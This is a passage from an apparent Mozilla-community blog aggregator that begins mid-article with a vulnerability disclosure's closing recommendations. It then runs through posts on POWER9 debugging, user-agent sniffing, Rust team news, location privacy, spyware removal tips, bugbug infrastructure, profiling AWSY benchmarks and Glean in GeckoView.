When I reported this vulnerability I gave five recommendations to reduce the attack surface. Out of these, one has been implemented: jQuery has been replaced by React, a framework not inherently prone to cross-site scripting vulnerabilities. So the immediate code execution vulnerability has been resolved.

Otherwise nothing changed however and the attack surface remains considerable. The following recommendations have not been implemented:

  1. Use the default Content Security Policy or at least remove 'unsafe-eval'.
  2. Restrict special privileges for custom-cursor.com to HTTPS and specific subdomains only. As custom-cursor.com isn’t even protected by HSTS, any person-in-the-middle attacker could force the website to load via unencrypted HTTP and inject malicious code into it.
  3. Protect custom-cursor.com website via Content Security Policy which would make exploitable cross-site scripting vulnerabilities far less likely.
  4. Restrict the privileges granted to the website, in particular removing arbitrary access to configuration options.

The first two changes in particular would have been trivial to implement, especially when compared to the effort of moving from jQuery to React. Why this has not been done is beyond me.

Timeline

  • 2021-06-30: Sent a vulnerability report to various email addresses associated with the extension
  • 2021-07-05: Requested confirmation that the report has been received
  • 2021-07-07: Received confirmation that the issue is being worked on
  • 2021-09-28: Published article (90 days deadline)

The Talospace ProjectDAWR YOLO even with DD2.3

Way back in Linux 5.2 was a "YOLO" mode for the DAWR register required for debugging with hardware watchpoints. This register functions properly on POWER8 but has an erratum on pre-DD2.3 POWER9 steppings (what Raptor sells as "v1") where the CPU will checkstop — invariably bringing the operating system to a screeching halt — if a watchpoint is set on cache-inhibited memory like device I/O. This is rare but catastrophic enough that the option to enable DAWR anyway is hidden behind a debugfs switch.

Now that I'm stressing out gdb a lot more working on the Firefox JIT, it turns out that even if you do upgrade your CPUs to DD2.3 (as I did for my dual-8 Talos II system, or what Raptor sells as "v2"), you don't automatically get access to the DAWR even on a fixed POWER9 (Fedora 34). Although you'll no longer be YOLOing it on such a system, still remember to echo Y > /sys/kernel/debug/powerpc/dawr_enable_dangerous as root and restart your debugger to pick up hardware watchpoint support.

Incidentally, I'm about two-thirds of the way through the wasm test cases. The MVP is little-endian POWER9 Baseline Interpreter and Wasm support, so we're getting closer and closer. You can help.

Karl DubostWhen iOS will allow other browsers

User agent sniffing is doomed to fail. It has this thick layer of opacity and logic, where you are never sure that you will really get in the end.

Stuffed animal through the opaque glass of a window.

This happens all the time and will happen again. It's often not only technical, but business related and just human. But let's focus on the detection of Firefox on iOS. Currently, on iOS, every browsers are using the same rendering engine. The one which is mandated by Apple. Be Chrome, Firefox, etc, they all use WKWebView.

One of the patterns of user agent detections goes like this:

  1. Which browsers? Firefox, Chrome, Safari, etc.
  2. Which device type? Mobile, Desktop, Tablet
  3. Which browser version?

You have 30s to guess what is missing in this scenario?

Yes, the OS. Is it iOS or Android? The current logic for some developers is that

  • Safari + mobile = iOS
  • Firefox + mobile = Android

As of today, Firefox

  • on iOS is version 37
  • on Android is version 94

So if the site has minimum version support grid

function l() {
  var t = window.navigator.userAgent,
    e = {
      action: "none",
    },
    n = c.warn,
    o = c.block;
  Object.keys(s).forEach(function (n) {
    t.match(n) && (e = c[s[n]]);
  });
  var r = a.detect(t);
  return (r.msie && r.version <= 11) ||
    (r.safari && r.version <= 8) ||
    (r.firefox && r.version <= 49)
    ? o
    : (r.chrome && r.version <= 21) ||
      (r.firefox && r.version <= 26 && !r.mobile && !r.tablet) ||
      (r.safari && r.version <= 4 && r.mobile) ||
      (r.safari && r.version <= 6) ||
      (r.android && r.version <= 4)
    ? n
    : e;
}

Here the site sees Firefox… so it must be Android, so it must be Gecko. They have set their minimum support for version 49. Firefox is then considered outdated. Safari minimum version on their grid is 8. So Firefox iOS (WebKitView) would have no issues!

Fast Forward To The Future.

When Apple authorizes different rendering engines on iOS (yes, I'm on the optimistic side, because I'm patient), I already foresee a huge webcompat issue. The web developers (who are currently right) will infer in some ways that Firefox on iOS can only be WebKitWebView. So the day Gecko is authorized on iOS, we can expect more breakages and ironically some of the webcompat bugs, we currently have will go away.

The Rust Programming Language BlogCore team membership updates

The Rust Core team is excited to announce the first of a series of changes to its structure we’ve been planning for 2021, starting today by adding several new members.

Originally, the Core team was composed of the leads from each Rust team. However, as Rust has grown, this has long stopped being true; most members of the Core team are not team leads in the project. In part, this is because Core’s duties have evolved significantly away from the original technical focus. Today, we see the Core team’s purpose as enabling, amplifying, and supporting the excellent work of every Rust team. Notably, this included setting up and launching the Rust Foundation.

We know that our maintainers, and especially team leads, dedicate an enormous amount of time to their work on Rust. We care deeply that it’s possible for not just people working full time on Rust to be leaders, but that part time volunteers can as well. To enable this, we wish to avoid coupling leading a team with a commitment to stewarding the project as a whole as part of the Core team. Likewise, it is important that members of the Core team have the option to dedicate their time to just the Core team’s activities and serve the project in that capacity only.

Early in the Rust project, composition of the Core team was made up of almost entirely Mozilla employees working full time on Rust. Because this team was made up of team leads, it follows that team leads were also overwhelmingly composed of Mozilla employees. As Rust has grown, folks previously employed at Mozilla left for new jobs and new folks appeared. Many of the new folks were not employed to work on Rust full time so the collective time investment was decreased and the shape of the core team’s work schedule shifted from 9-5 to a more volunteer cadence. Currently, the Core team is composed largely of volunteers, and no member of the Core team is employed full time to work on their Core team duties.

We know that it’s critical to driving this work successfully to have stakeholders on the team who are actively working in all areas of the project to help prioritize the Core team’s initiatives. To serve this goal, we are announcing some changes to the Core team’s membership today: Ryan Levick, Jan-Erik Rediger, and JT are joining the Core team. To give some context on their backgrounds and experiences, each new member has written up a brief introduction.

  • Ryan Levick began exploring Rust in 2014 always looking for more and more ways to be involved in the community. Over time he participated more by co-organizing the Berlin Rust meetup, doing YouTube tutorials, helping with various project efforts, and more. In 2019, Ryan got the opportunity to work with Rust full time leading developer advocacy for Rust at Microsoft and helping build up the case for Rust as an official language inside of Microsoft. Nowadays he’s an active Rust project member with some of the highlights including working in the compiler perf team, running the Rust annual survey, and helping the 2021 edition effort.
  • Jan-Erik Rediger started working with Rust sometime in late 2014 and has been a member of the Rust Community Team since 2016. That same year he co-founded RustFest, one of the first conferences dedicated to Rust. In the following years seven RustFest conferences have brought together hundreds of Rust community members all around Europe and more recently online.
  • JT has 15 years of programming language experience. During that time, JT worked at Cray on the Chapel programming language and at Apple on LLVM/Clang. In 2012, they joined Microsoft as part of the TypeScript core team, where they helped to finish and release TypeScript to the world. They stayed on for over three years, helping direct TypeScript and grow its community. From there, they joined Mozilla to work on Rust, where they brought their experience with TypeScript to help the Rust project transition from a research language to an industrial language. During this time, they co-created the new Rust compiler error message format and the Rust Language Server. Their most recent work is with Nushell, a programming language implemented in Rust.

These new additions will add fresh perspectives along several axes, including geographic and employment diversity. However, we recognize there are aspects of diversity we can continue to improve. We see this work as critical to the ongoing health of the Rust project and is part of the work that will be coordinated between the Rust core team and the Rust Foundation.

Manish Goregaokar is also leaving the team to be able to focus better on the dev-tools team. Combining team leadership with Core team duties is a heavy burden. While Manish has enjoyed his time working on project-wide initiatives, this coupling isn’t quite fair to the needs of the devtools team, and he’s glad to be able to spend more time on the devtools team moving forward.

The Core team has been doing a lot of work in figuring out how to improve how we work and how we interface with the rest of the project. We’re excited to be able to share more on this in future updates.

We're super excited for Manish’s renewed efforts on the dev tools team and for JT, Ryan, and Jan-Erik to get started on core team work! Congrats and good luck!

This post is part 1 of a multi-part series on updates to the Rust core team.

Cameron KaiserQuestionable RCE with .webloc/.inetloc files

A report surfaced recently that at least some recent versions of macOS can be exploited to run arbitrary local applications using .inetloc files, which may allow a drive-by download to automatically kick off a vulnerable application and exploit it. Apple appeared to acknowledge the fault, but did not assign it a CVE; the reporter seems not to have found the putative fix satisfactory and public disclosure thus occurred two days ago.

The report claims the proof of concept works on all prior versions of macOS, but it doesn't seem to work (even with corrected path) on Tiger. Unfortunately due to packing I don't have a Leopard or Snow Leopard system running right now, so I can't test those, but the 10.4 Finder (which would launch these files) correctly complains they are malformed. As a safety measure in case there is something exploitable, the October SPR build of TenFourFox will treat both .webloc and .inetloc files that you might download as executable. (These files use similar pathways, so if one is exploitable after all, then the other probably is too.) I can't think of anyone who would depend on the prior behaviour, but in our unique userbase I'm sure someone does, so I'm publicizing this now ahead of the October 5 release. Meanwhile, if someone's able to make the exploit work on a Power Mac, I'd be interested to hear how you did it.

This Week In RustThis Week in Rust 409

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
RustConf 2021
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is flowistry, a VS code extension to visualize data flow in Rust code.

Thanks to Willi Kappler for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

256 pull requests were merged in the last week

Rust Compiler Performance Triage

A nice week: more improvements than regressions.

Triage done by @pnkfelix. Revision range: 9f85cd6f2..7743c9f

2 Regressions, 4 Improvements, 8 Mixed; ??? of them in rollups

44 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America
Europe

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Kollider

Subspace Labs

Oxford Ionics

ChainSafe

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

the strains of the project have hurt a lot of people over the years and I think maybe the only path to recovery involves getting some distance from it.

Graydon Hoare on twitter

Thanks to mmmmib for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Mozilla BlogLocation history: How your location is tracked and how you can limit sharing it

In real estate, the age old mantra is “location, location, location,” meaning that location drives value. That’s true even when it comes to data collection in the online world, too — your location history is valuable, authentic information. In all likelihood, you’re leaving a breadcrumb trail of location data every day, but there are a few things you can do to clean that up and keep more of your goings-on to yourself. 

What is location history?

When your location is tracked and stored over time, it becomes a body of data called your location history. This is rich personal data that shows when you have been at specific locations, and can include things like frequency and duration of visits and stops along the way. Connecting all of that location history, companies can create a detailed picture and make inferences about who you are, where you live and work, your interests, habits, activities, and even some very private things you might not want to share at all.

How is location data used?

For some apps, location helps them function better, like navigating with a GPS or following a map. Location history can also be useful for retracing your steps to past places, like finding your way back to that tiny shop in Florence where you picked up beautiful stationery two years ago.

On the other hand, marketing companies use location data for marketing and advertising purposes. They can also use location to conduct “geomarketing,” which is targeting you with promotions based on where you are. Near a certain restaurant while you’re out doing errands at midday? You might see an ad for it on your phone just as you’re thinking about lunch.

Location can also be used to grant or deny access to certain content. In some parts of the world, content on the internet is “geo-blocked” or geographically-restricted based on your IP address, which is kind of like a mailing address, associated with your online activity. Geo-blocking can happen due to things like copyright restrictions, limited licensing rights or even government control. 

Who can view your location data?

Any app that you grant permission to see your location has access to it. Unless you carefully read each data policy or privacy policy, you won’t know how your location data — or any personal data — collected by your apps is used. 

Websites can also detect your general location through your IP address or by asking directly what your location is, and some sites will take it a step further by requesting more specifics like your zip code to show you different site content or search results based on your locale.

How to disable location request prompts

Tired of websites asking for your location? Here’s how to disable those requests:

Firefox: Type “about:preferences#privacy” in the URL bar. Go to Permissions > Location > Settings. Select “Block new requests asking to access your location”. Get more details about location sharing in Firefox.

Safari: Go to Settings > Websites > Location. Select “When visiting other websites: Deny.”

Chrome: Go to Settings > Privacy and security > Site Settings. Then click on Location and select “Don’t allow sites to see your location”

Edge: Go to Settings and more > Settings > Site permissions > Location. Select “Ask before accessing”

Limit, protect and delete your location data

Most devices have the option to turn location tracking off for the entire device or for select apps. Here’s how to view and change your location privacy settings:

How to delete your Google Location History
Ready to delete your Google Location History in one fell swoop? There’s a button for that.

It’s also a good idea to review all of the apps on your devices. Check to see if you’re sharing your location with some that don’t need it all or even all the time. Some of them might be set up just to get your location, and give you little benefit in return while sharing it with a network of third parties. Consider deleting apps that you don’t use or whose service you could just as easily get through a mobile browser where you might have better location protection.

Blur your device’s location for next-level privacy

Learn more about Mozilla VPN

The post Location history: How your location is tracked and how you can limit sharing it appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 100

Highlights

    • Firefox 92 was released today!
    • We’re 96% through M1 for Fluent migration! Great work from kpatenio and niklas!
      • [Screenshot]
        • Caption: A graph showing how Fluent strings have overtaken DTD strings over time as the dominant string mechanism in browser.xhtml. As of September 2nd, it shows that there are 732 Fluent strings and 32 DTD strings in browser.xhtml
      • Fluent is our new localization framework
    • We have improvements coming soon for our downloads panel! You can opt in by enabling browser.download.improvements_to_download_panel in about:config.
  • Nightly now has an about:unloads page to show some of the locally collected heuristics being used to decide which tabs to unload on memory pressure. You can also manually unload tabs from here.
    • As part of Fission-related changes, we’ve rearchitected some of the internals of the WebExtensions framework – see Bug 1708243
  • If you notice recent addons-related regressions in Nightly 94 and Beta 93 (e.g. like Bug 1729395, affecting the multi-account-containers addon), please file a bug and needinfo us (rpl or zombie).

Friends of the Firefox team

For contributions from August 25th to September 7th 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

  • Ava Katushka
  • Itiel
  • Michael Kohler [:mkohler]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • :gregtatum landed in Firefox 93 a follow up to Bug 1722087 to migrate users away from the old recommended themes that have been removed from the omni.jar – Bug 1723602.
WebExtension APIs
  • extension.getViews now returns existing sidebar extension pages also when called with a `windowId` filter – Bug 1612390 (closed by one of the changes landed as part of Bug 1708243)

Downloads Panel

Fluent

Form Autofill

  • Bug 1687684 – Fix credit card autofill when the site prefills fields
  • Bug 1688209 – Prevent simple hidden fields from being eligible for autofill.

High-Contrast Mode (MSU Capstone project)

  • Molly and Micah have kicked off another semester working with MSU capstone students. They’ll be helping us make a number of improvements to high-contrast mode on Firefox Desktop. See this meta bug to follow along.
  • We’ll be doing a hack weekend on September 11 & 12 where students will get ramped up on their first bugs and tools needed to do Firefox development.

Lint, Docs and Workflow

Password Manager

  • Welcome Serg Galich, he’ll be working on credential management with Tim and Dimi.

Search and Navigation

  • Drew landed some early UI changes, part of Firefox Suggest, in Nightly. In particular, labels have been added to Address Bar groups. A goal of Firefox Suggest is to provide smarter and more useful results, and better grouping, while also improving our understanding of how the address bar results are perceived. More experiments are still ongoing and planned for the short future.
  • Daisuke landed a performance improvement to the address bar tokenizer. Bug 1726837

Mike TaylorTesting Chrome version 100 for fun and profit (but mostly fun I guess)

Great news readers, my self-imposed 6 month cooldown on writing amazing blog posts has expired.

My pal Ali just added a flag to Chromium to allow you to test sites while sending a User-Agent string that claims to be version 100 (should be in version 96+, that’s in the latest Canary if you download or update today):

screenshot of chrome://flags/#force-major-version-to-100

I’ll be lazy and let Karl Dubost do the explaining of the why, in his post “Get Ready For Three Digits User Agent Strings”.

So turn it on and report all kinds of bugs, either at crbug.com/new or webcompat.com/issues/new.

Firefox Add-on ReviewsYouTube your way—browser extensions put you in charge of your video experience

YouTube wants you to experience YouTube in very prescribed ways. But with the right browser extension, you’re free to alter YouTube to taste. Change the way the site looks, behaves, and delivers your favorite videos. 

Enhancer for YouTube

With dozens of customization features, Enhancer for YouTube has the power to dramatically reorient the way you watch videos. 

While a bunch of customization options may seem overwhelming, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

<figcaption>Enhancer for YouTube offers easy access controls just beneath the video player.</figcaption>

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration

YouTube High Definition

Though its primary function is to automatically play all YouTube videos in their highest possible resolution, YouTube High Definition has a few other fine features to offer. 

In addition to automatic HD, YouTube High Definition can…

  • Customize video player size
  • HD support for clips embedded on external sites
  • Specify your ideal resolution (4k – 144p)
  • Set a preferred volume level 
  • Also automatically plays the highest quality audio

YouTube NonStop

So simple. So awesome. YouTube NonStop remedies the headache of interrupting your music with that awful “Video paused. Continue watching?” message. 

Works on YouTube and YouTube Music. You’re now free to navigate away from your YouTube tab for as long as you like and not fret that the rock will stop rolling. 

YouTube Audio

Another simple but great extension for music fans, YouTube Audio disables the video broadcast and just streams audio to save you a ton of bandwidth. 

This is an essential extension if you have limited internet bandwidth and only want the music anyway. Click YouTube Audio’s toolbar button to mute the video stream anytime you like. Also helps preserve battery life. 

PocketTube

If you subscribe to a lot of YouTube channels PocketTube is a fantastic way to organize all your subscriptions by themed collections. 

Group your channel collections by subject, like “Sports,” “Cooking,” “Cat videos” or whatever. Other key features include…

  • Add custom icons to easily identify your channel collections
  • Customize your feed so you just see videos you haven’t watched yet, prioritize videos from certain channels, plus other content settings
  • Integrates seamlessly with YouTube homepage 
  • Sync collections across Firefox/Android/iOS using Google Drive and Chrome Profiler
<figcaption>PocketTube keeps your channel collections neatly tucked away to the side. </figcaption>

AdBlocker for YouTube

It’s not just you who’s noticed a lot more ads lately. Regain control with AdBlocker for YouTube

The extension very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster, more focused YouTube. 

SponsorBlock

It’s a terrible experience when you’re enjoying a video or music on YouTube and you’re suddenly interrupted by a blaring ad. SponsorBlock solves this problem in a highly effective and original way. 

Leveraging the power of crowd sourced information to locate where—precisely— interruptive sponsored segments appear in videos, SponsorBlock learns where to automatically skip sponsored segments with its ever growing database of videos. You can also participate in the project by reporting sponsored segments whenever you encounter them (it’s easy to report right there on the video page with the extension). 

SponsorBlock can also learn to skip non-music portions of music videos and intros/outros, as well. If you’d like a deeper dive of SponsorBlock we profiled its developer and open source project on Mozilla Distilled

We hope one of these extensions enhances the way you enjoy YouTube. Feel free to explore more great media extensions on addons.mozilla.org

 

The Mozilla BlogDid you hear about Apple’s security vulnerability? Here’s how to find and remove spyware.

Spyware has been in the news recently with stories like the Apple security vulnerability that allowed devices to be infected without the owner knowing it, and a former editor of The New York Observer being charged with a felony for unlawfully spying on his spouse with spyware. Spyware is a sub-category of malware that’s aimed at surveilling the behavior of human target(s) using a given device where the spyware is running. This surveillance could include but is not limited to logging keystrokes, capturing what websites you are visiting, looking at your locally stored files/passwords, and capturing audio or video within proximity to the device.

How does spyware work?

Spyware, much like any other malware, doesn’t just appear on a device. It often needs to first be installed or initiated. Depending on what type of device, this could manifest in a variety of ways, but here are a few specific examples:

  • You could visit a website with your web browser and a pop-up prompts you to install a browser extension or addon.
  • You could visit a website and be asked to download and install some software you weren’t there to get.
  • You could visit a website that prompts you to access your camera or audio devices, even though the website doesn’t legitimately have that need.
  • You could leave your laptop unlocked and unattended in a public place, and someone could install spyware on your computer.
  • You could share a computer or your password with someone, and they secretly install the spyware on your computer.
  • You could be prompted to install a new and unknown app on your phone.
  • You install pirated software on your computer, but this software additionally contains spyware functionality.

With all the above examples, the bottom line is that there could be software running with a surveillance intent on your device. Once installed, it’s often difficult for a lay person to have 100% confidence that their device can be trusted again, but for many the hard part is first detecting that surveillance software is running on your device.

How to detect spyware on your computer and phone

As mentioned above, spyware, like any malware, can be elusive and hard to spot, especially for a layperson. However, there are some ways by which you might be able to detect spyware on your computer or phone that aren’t overly complicated to check for.

Cameras

On many types of video camera devices, you get a visual indication that the video camera is recording. These are often a hardware controlled light of some kind that indicates the device is active. If you are not actively using your camera and these camera indicator lights are on, this could be a signal that you have software on your device that is actively recording you, and it could be some form of spyware. 

Here’s an example of what camera indicator lights look like on some Apple devices, but active camera indicators come in all kinds of colors and formats, so be sure to understand how your device works. A good way to test is to turn on your camera and find out exactly where these indicator lights are on your devices.

Additionally, you could make use of a webcam cover. These are small mechanical devices that allow users to manually open and shut cameras only when in use. These are generally a very cheap and low-tech way to protect snooping via cameras.

Applications

One pretty basic means to detect malicious spyware on systems is simply reviewing installed applications, and only keeping applications you actively use installed.

On Apple devices, you can review your applications folder and the app store to see what applications are installed. If you notice something is installed that you don’t recognize, you can attempt to uninstall it. For Windows computers, you’ll want to check the Apps folder in your Settings

Web extensions

Many browsers, like Firefox or Chrome, have extensive web extension ecosystems that allow users to customize their browsing experience. However, it’s not uncommon for malware authors to utilize web extensions as a medium to conduct surveillance activities of a user’s browsing activity.

On Firefox, you can visit about:addons and view all your installed web extensions. On Chrome, you can visit chrome://extensions and view all your installed web extensions. You are basically looking for any web extensions that you didn’t actively install on your own. If you don’t recognize a given extension, you can attempt to uninstall it or disable it.

Add features to Firefox to make browsing faster, safer or just plain fun.

Get quality extensions, recommended by Firefox.

How do you remove spyware from your device?

If you recall an odd link, attachment, download or website you interacted with around the time you started noticing issues, that could be a great place to start when trying to clean your system. There are various free online tools you can leverage to help get a signal on what caused the issues you are experiencing. VirusTotal, UrlVoid and HybridAnalysis are just a few examples. These tools can help you determine when the compromise of your system occurred. How they can do this varies, but the general idea is that you give it the file or url you are suspicious of, and it will return a report to you showing what various computer security companies know about the file or url. A point of infection combined with your browser’s search history would give you a starting point of various accounts you will need to double check for signs of fraudulent or malicious activity after you have cleaned your system. This isn’t entirely necessary in order to clean your system, but it helps jumpstart your recovery from a compromise.

There are a couple of paths that can be followed in order to make sure any spyware is entirely removed from your system and give you peace of mind:

Install an antivirus (AV) software from a well-known company and run scans on your system

  • If you have a Windows device, Windows Defender comes pre-installed, and you should double-check that you have it turned on.
  • If you currently have an AV software installed, make sure it’s turned on and that it’s up to date. Should it fail to identify and remove the spyware from your system, then it’s on to one of the following options.

Run a fresh install of your system’s operating system

  • While it might be tempting to backup files you have on your system, be careful and remember that your device was compromised and the file causing the issue could end up back on your system and again compromising it.
  • The best way to do this would be to wipe the hard drive of your system entirely, and then reinstall from an external device.

How can you protect yourself from getting spyware?

There are a lot of ways to help keep your devices safe from spyware, and in the end it can all be boiled down to employing a little healthy skepticism and practicing good basic digital hygiene. These tips will help you stay on the right track:

Be wary. Don’t click on links, open/download attachments from unknown senders. This applies to both messaging apps as well as emails. 

Stay updated. Take the time to install updates/patches. This helps make sure your devices and apps are protected against known issues.

Check legitimacy. If you aren’t sure if a website or email is giving legitimate information, take the time to use your favorite search engine to find the legitimate website. This helps avoid issues with typos potentially leading you to a bad website

Use strong passwords. Ensure all your devices have solid passwords that are not shared. It’s easier to break into a house that isn’t locked.

Delete extras. Remove applications you don’t use anymore. This reduces the total attack surface you are exposing, and has the added bonus of saving space for things you care about.

Use security settings. Enable built in browser security features. By default, Firefox is on the lookout for malware and will alert you to Deceptive Content and Dangerous Software.

The post Did you hear about Apple’s security vulnerability? Here’s how to find and remove spyware. appeared first on The Mozilla Blog.

Marco Castellucciobugbug infrastructure: continuous integration, multi-stage deployments, training and production services

bugbug started as a project to automatically assign a type to bugs (defect vs enhancement vs task, back when we introduced the “type” we needed a way to fill it for already existing bugs), and then evolved to be a platform to build ML models on bug reports: we now have many models, some of which are being used on Bugzilla, e.g. to assign a type, to assign a component, to close bugs detected as spam, to detect “regression” bugs, and so on.

Then, it evolved to be a platform to build ML models for generic software engineering purposes: we now no longer only have models that operate on bug reports, but also on test data, patches/commits (e.g. to choose which tests to run for a given patch and to evaluate the regression riskiness associated to a patch), and so on.

Its infrastructure also evolved over time and slowly became more complex. This post attempts to clarify its overall infrastructure, composed of multiple pipelines and multi-stage deployments.

The nice aspect of the continuous integration, deployment and production services of bugbug is that almost all of them are running completely on Taskcluster, with a common language to define tasks, resources, and so on.

In bugbug’s case, I consider a release as a code artifact (source code at a given tag in our repo) plus the ML models that were trained with that code artifact and the data that was used to train them. This is because the results of a given model are influenced by all these aspects, not just the code as in other kinds of software. Thus, in the remainder of this post, I will refer to “code artifact” or “code release” when talking about a new version of the source code, and to “release” when talking about a set of artifacts that were built with a specific snapshot (version) of the source code and with a specific snapshot of the data.

The overall infrastructure can be seen in this flowchart, where the nodes represent artifacts and the subgraphs represent the set of operations performed on them. The following sections of the blog post will then describe the components of the flowchart in more detail. Flowchart of the bugbug infrastructure

Continuous Integration and First Stage (Training Pipeline) Deployment

Every pull request and push to the repository triggers a pipeline of Taskcluster tasks to:

  • run tests for the library and its linked HTTP service;
  • run static analysis and linting;
  • build Python packages;
  • build the frontend;
  • build Docker images.

Code releases are represented by tags. A push of a tag triggers additional tasks that perform:

  • integration tests;
  • push of Docker images to DockerHub;
  • release of a new version of the Python package on PyPI;
  • update of the training pipeline definition.

After a code release, the training pipeline which performs ML training is updated, but the HTTP service, the frontend and all the production pipelines that depend on the trained ML models (the actual release) are still on the previous version of the code (since they can’t be updated until the new models are trained).

Continuous Training and Second Stage (ML Model Services) Deployment

The training pipeline runs on Taskcluster as a hook that is either triggered manually or on a cron.

The training pipeline consists of many tasks that:

  • retrieve data from multiple sources (version control system, bug tracking systems, Firefox CI, etc.);
  • generation of intermediate artifacts that are used by later stages of the pipeline or by other pipelines or other services;
  • training of ML models using the above (there are also training tasks that depend on other models to be trained and run first to generate intermediate artifacts);
  • check training metrics to ensure there are no short term or long term regressions;
  • run integration tests with the trained models;
  • build Docker images with the trained models;
  • push Docker images with the trained models;
  • update the production pipelines definition.

After a run of the training pipeline, the HTTP service and all the production pipelines are updated to the latest version of the code (if they weren’t already) and to the last version of the trained models.

Production pipelines

There are multiple production pipelines (here’s an example), that serve different objectives, all running on Taskcluster and triggered either on cron or by pulse messages from other services.

Frontend

The bugbug UI lives at https://changes.moz.tools/, and it is simply a static frontend built in one of the production pipelines defined in Taskcluster.

The production pipeline performs a build and uploads the artifact to S3 via Taskcluster, which is then exposed at the URL mentioned earlier.

HTTP Service

The HTTP service is the only piece of the infrastructure that is not running on Taskcluster, but currently on Heroku.

The Docker images for the service are built as part of the training pipeline in Taskcluster, the trained ML models are included in the Docker images themselves. This way, it is possible to rollback to an earlier version of the code and models, should a new one present a regression.

There is one web worker that answers to requests from users, and multiple background workers that perform ML model evaluations. These must be done in the background because of performance reasons (the web worker must answer quickly). The ML evaluations themselves are quick, and so could be directly done in the web worker, but the input data preparation can be slow as it requires interaction with external services such as Bugzilla or a remote Mercurial server.

Paul BoneRunning the AWSY benchmark in the Firefox profiler

The are we slim yet (AWSY) benchmark measures memory usage. Recently when I made a simple change to firefox and expected it might save a bit of memory, it actually increased memory usage on the AWSY benchmark.

We have lots of tools to hunt down memory usage problems. But to see an almost "log" of when garbage collection and cycle collection occurs, the Firefox profiler is amazing.

I wanted to profile the AWSY benchmark to try and understand what was happening with GC scheduling. But it didn’t work out-of-the-box. This is one of those blog posts that I’m writing down so next time this happens, to me or anyone else, although I am selfish. And I websearch for "AWSY and Firefox Profiler" I want this to be the number 1 result and help me (or someone else) out.

The normal instructions

First you need a build with profiling enabled. Put this in your mozconfig

ac_add_options --enable-debug
ac_add_options --enable-debug-symbols
ac_add_options --enable-optimize
ac_add_options --enable-profiling

The instructions to get the profiler to run came from Ted Campbell. Thanks Ted.

Ted’s instructions disabled stack sampling, we didn’t care about that since the data we need comes from profile markers. I can also run a reduced awsy test because 10 entries is enough to create the problem.

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES="nostacksampling"
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

But it crashes due to Bug 1710408.

So I can’t use nostacksampling, which would have been nice to save some memory/disk space, never mind.

So I removed that option, then I get profiles that are too short. The profiler records into a circular buffer so if that buffer is too small it’ll discard the earlier information. In this case I want the earlier information because I think something at the beginning is the problem. So I need to add this to get a bigger buffer. The default is 4 million entries (32MB).

export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))

But now the profiles are too big and Firefox shutdown times out (over 70 seconds) so the marionette test driver kills Firefox before it can write out the profile.

The solution

So we hack testing/marionette/client/marionette_driver/marionette.py to replace shutdown_timeout with 300 in some places. Setting DEFAULT_SHUTDOWN_TIMEOUT and also self.shutdown_timeout to 300 will do. There’s probably a way to pass a parameter, but I didn’t find it yet. So after making that change and running ./mach build the invocation is now:

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES=""
export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

And it writes a awsy-profile.json into the root directory of the project).

Hurray!

Data@MozillaThis Week in Glean: Glean & GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index.


This is a followup post to Shipping Glean with GeckoView.

It landed!

It took us several more weeks to put everything into place, but we’re finally shipping the Rust parts of the Glean Android SDK with GeckoView and consume that in Android Components and Fenix. And it still all works, collects data and is sending pings! Additionally this results in a slightly smaller APK as well.

This unblocks further work now. Currently Gecko simply stubs out all calls to Glean when compiled for Android, but we will enable recording Glean metrics within Gecko and exposing them in pings sent from Fenix. We will also start work on moving other Rust components into mozilla-central in order for them to use the Rust API of Glean directly. Changing how we deliver the Rust code also made testing Glean changes across these different components a bit more challenging, so I want to invest some time to make that easier again.

Jan-Erik RedigerThis Week in Glean: Glean & GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All "This Week in Glean" blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.


This is a followup post to Shipping Glean with GeckoView.

It landed!

